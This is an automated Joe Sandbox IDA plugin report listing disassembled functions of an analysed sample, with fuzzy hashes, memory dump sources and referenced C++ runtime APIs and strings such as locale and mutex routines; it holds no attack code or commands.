Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 8cb637d067048b63ed59c14c1883ed8dab06d4a754e3ec57e22a21e27be1794c
Instruction ID: bf0181a444f7070f06f2c87511b09c1bdd88c04d267140d8fb064ce580a8e9fb
Opcode Fuzzy Hash: 8cb637d067048b63ed59c14c1883ed8dab06d4a754e3ec57e22a21e27be1794c
Instruction Fuzzy Hash: 99322731A1120A8FDF08EF68CC95BEEB7B5EF45304F144258E805AB2D2D775AE55CBA0

Function 0027A720 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

File, xrefs: 0027A93C

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: File
API String ID: 0-749574446
Opcode ID: 1abb8360785431a47b20436cae0be934a170fbbb9c607f30359bdc02b0dd9297
Instruction ID: c2ed276e774c0d53e7eec3a32801d4f0cf67d1594bf2f44815bfa73c103a7537
Opcode Fuzzy Hash: 1abb8360785431a47b20436cae0be934a170fbbb9c607f30359bdc02b0dd9297
Instruction Fuzzy Hash: B1C1F270D102489FDF15DFA4CD46BEEBBB9EF45314F104069E508BB291E770A954CBA2

Function 0034CCDC Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0034C6EA,?,?,?,?,00284A9B,?,0028F03C), ref: 0034CCF5

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: f851fb8744d80123bed4403842c2616af09646f3621d0907ba2840308142a0dd
Instruction ID: b9cc05dca638beac777e002efd68e9cbb650067bb69aa5865ea9044224b7baf3
Opcode Fuzzy Hash: f851fb8744d80123bed4403842c2616af09646f3621d0907ba2840308142a0dd
Instruction Fuzzy Hash: 51D02232653138938E633B94BC0056DBBCCEF85B607095016EE0C3B150CA617C0057E0

Function 00272040 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

string too long, xrefs: 00272040

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2141394445-2556327735
Opcode ID: 1e08563a173a006419b4600d59d76f16d04eb6c19a067bd38541bf5abdeeb7c4
Instruction ID: 644c23a74f478af6f027afd431f53adebfa35983034cfafba619321f0d58a0fd
Opcode Fuzzy Hash: 1e08563a173a006419b4600d59d76f16d04eb6c19a067bd38541bf5abdeeb7c4
Instruction Fuzzy Hash: C381F175A04196DFDB02CFA8C4517EEBFB5EF1A300F188199D9886B783C3758659CBA0

Function 0027AB50 Relevance: 1.1, Instructions: 1084COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f1a44a1cc40b2a5dd238493d1f1517ac9ec395c9e0157eff49252453c8d4afb
Instruction ID: f7ff3c83b873333c673ed2c65f71e21f348136e6157aa608c4ebe32e923a825b
Opcode Fuzzy Hash: 5f1a44a1cc40b2a5dd238493d1f1517ac9ec395c9e0157eff49252453c8d4afb
Instruction Fuzzy Hash: 27923631C202498BDF1ACFB8C8547FEBB75EF46314F24C299D8596B282D7305A5ACB91

Function 002F4C20 Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79093a5f2d01eeaa5526eb47ca4635751f3a5d0c2a5c38a616d31166b5fe5e45
Instruction ID: e7825e2da3a58d74adcb6fbf919120642db89bf943313cf52aed4bdfd5d89504
Opcode Fuzzy Hash: 79093a5f2d01eeaa5526eb47ca4635751f3a5d0c2a5c38a616d31166b5fe5e45
Instruction Fuzzy Hash: 7F625DB0E1021A9BDB14CF59C5846AEFBF1BF88348F2481ADDA04AB342D775D956CF90

Function 0035991F Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7224e10e0f5057d5ecffe88508de54a6e7bede1dbb6ddec7f5f7d4b4d6bb3b9a
Instruction ID: 7fb20c397beb4cb39cfd8b1c7c6abcc6e56b63eabe2a22c73d76ceebaf0761c7
Opcode Fuzzy Hash: 7224e10e0f5057d5ecffe88508de54a6e7bede1dbb6ddec7f5f7d4b4d6bb3b9a
Instruction Fuzzy Hash: 4CC1DC70900646CEDB27CF28C984F7ABBB9AB05302F19060FDC569B6B1C731A94CCB61

Function 002722C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2660e0f182a6e3a809521e4dbfbbf69b72aecf260c47a7542baabff9492a9d
Instruction ID: 273b924aaba555cbe313a17a53e6fab7144ad5678a153c755650483728a058c4
Opcode Fuzzy Hash: 2e2660e0f182a6e3a809521e4dbfbbf69b72aecf260c47a7542baabff9492a9d
Instruction Fuzzy Hash: 937124B1E10156CFDB168F69C8907BFBBB5EB1A300F4482A8D85997783C334991AC7A0

Function 002F1940 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55936177c0cadf8e64807edef39b1c1cc04f8487d53122d72d552d84443274e0
Instruction ID: 6cf8f84fa7d388b4cab6cce63ce85fd1a702dd7cb4c5c8c3da1edb927f282b30
Opcode Fuzzy Hash: 55936177c0cadf8e64807edef39b1c1cc04f8487d53122d72d552d84443274e0
Instruction Fuzzy Hash: 9861A3316302658FD749CF6EECD0536B355E38A31178942ABEA82CB395C635E936C7E0

Function 00284AB0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e4ac4dedcaeb8a5061242e32770af3a7ff9466b844038cb6691bbd591f7922
Instruction ID: dcd8db24d9187a5c2bc5a8922c8c323052c2041b461e556f02eb572628f776b4
Opcode Fuzzy Hash: 91e4ac4dedcaeb8a5061242e32770af3a7ff9466b844038cb6691bbd591f7922
Instruction Fuzzy Hash: C851B375D1120A9FCB04EF68C841BEEBBB4FF48714F108259E815B7390D770AE548BA4

Function 00353ED8 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction ID: 751ac7a02601a5668a77d2ab512413d34f180c2427f7b693c919058537463b3d
Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction Fuzzy Hash: BB51B072D00219EFDF15CF98C840AEEFBB6FF88305F5A8059E914AB251D734AA45CB90

Function 00350750 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9dc7ee35bf668246bc6c74dd410fc3076fd972b0826d19ec81c07dd2f6d658c7
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6111087B24114143D65E863DD8F4EBBA7A5EACD323B2E427ADC824B774D123B94D9D00

Function 04E8030D Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 406d510390014fefd1a82c20581410ebb3d72bbedb9bfe5da394d14f634be72f
Instruction ID: 5c05e549f2a3765b0e8837543321cc35fd6e434991aa706e06b4bfa9d745b3de
Opcode Fuzzy Hash: 406d510390014fefd1a82c20581410ebb3d72bbedb9bfe5da394d14f634be72f
Instruction Fuzzy Hash: 20F014FA30C5257FB906E1862B209FB676EE6C6B30332D42EF40FC6156E6945E4E6031

Function 002DAE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002DAEB3
std::_Lockit::_Lockit.LIBCPMT ref: 002DAED5
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 002DAF1F
std::_Lockit::_Lockit.LIBCPMT ref: 002DAF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 002DB088
std::_Facet_Register.LIBCPMT ref: 002DB095

Strings

bad locale name, xrefs: 002DB0AF

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 61ab7fc679b365d35d154aae093ef1961e0b4681806bb741df9f3c4fbe8ac0db
Instruction ID: a9102804d1ac02778f9c1eefa2933936d83d31b936d119d17c345d4b3324d86c
Opcode Fuzzy Hash: 61ab7fc679b365d35d154aae093ef1961e0b4681806bb741df9f3c4fbe8ac0db
Instruction Fuzzy Hash: 0F618DB1D102459FDF22DFA4D885B9EBBF8AF05310F184459E854AB381E735ED09CBA2

Function 00273770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
__Getctype.LIBCPMT ref: 0027384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF

Strings

0:', xrefs: 00273848
